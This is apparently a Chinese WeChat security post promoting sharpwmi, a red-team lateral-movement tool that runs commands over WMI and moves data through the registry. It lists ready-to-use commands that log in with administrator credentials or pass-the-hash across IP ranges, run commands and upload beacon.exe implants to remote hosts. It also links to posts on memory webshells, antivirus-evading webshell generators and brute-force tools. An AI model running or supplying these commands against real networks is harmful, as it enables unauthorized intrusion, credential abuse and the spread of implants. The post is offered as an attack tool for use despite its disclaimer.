upzhu x9sec
x9sec
微信号 x9sec_com
功能介绍 进行网络安全知识分享,渗透测试,红队蓝队技术分享,安全开发平台开源
__发表于
收录于合集
声明:
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本
公众号无关。
项目简介
这是一个基于135端口来进行横向移动的工具,具有执行命令和上传文件功能,通过wmi来执行命令,通过注册表来进行数据传输.
项目描述
**命令
**
sharpwmi.exe login 192.168.2.3 administrator 123 cmd whoamisharpwmi.exe login 192.168.2.3/24 administrator 123 cmd whoamisharpwmi.exe login 192.168.2.3-23 administrator 123 upload beacon.exe c:\beacon.exesharpwmi.exe pth 192.168.2.3-192.168.2.77 cmd whoamisharpwmi.exe pth 192.168.2.3/255.255.255.0 upload beacon.exe c:\beacon.exe
**
**
通过wmi来执行命令,server将命令结果存在本机注册表,然后client连接注册表进行读取命令结果
client将需要上传的文件放到server的注册表里面,然后server通过powershell来操作注册表方式来取文件然后释放到本地
- 不依赖139和445端口
-
目前只支持上传512kb以下的文件,因为注册表每个值值长度不能超过512kb。
-
执行命令和上传文件都依赖powershell
-
用添加增加多个值的方式来实现上传任意大小文件
-
去除powershell依赖
下载地址
项目地址: https://github.com/idiotc4t/sharpwmi ****
添加管理微信进内部交流群
**
**
**
**
WebSocket 内存马/Webshell,一种新型内存马/WebShell技术
Chunsou(春蒐),Web指纹资产识别,风险收敛以及企业互联网资产风险摸查识别工具
生成各类免杀webshell适合市面上常见的几种webshell管理工具、冰蝎、蚁剑、哥斯拉
Spring漏洞综合利用工具——Spring_All_Reachable
MySql、Oracle、金仓、达梦、神通等数据库、Redis等管理工具
jmx未授权访问 弱口令批量检测 GUI工具 - jmxbfGUI
预览时标签不可点
微信扫一扫
关注该公众号
知道了
微信扫一扫
使用小程序
取消 允许
取消 允许
: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看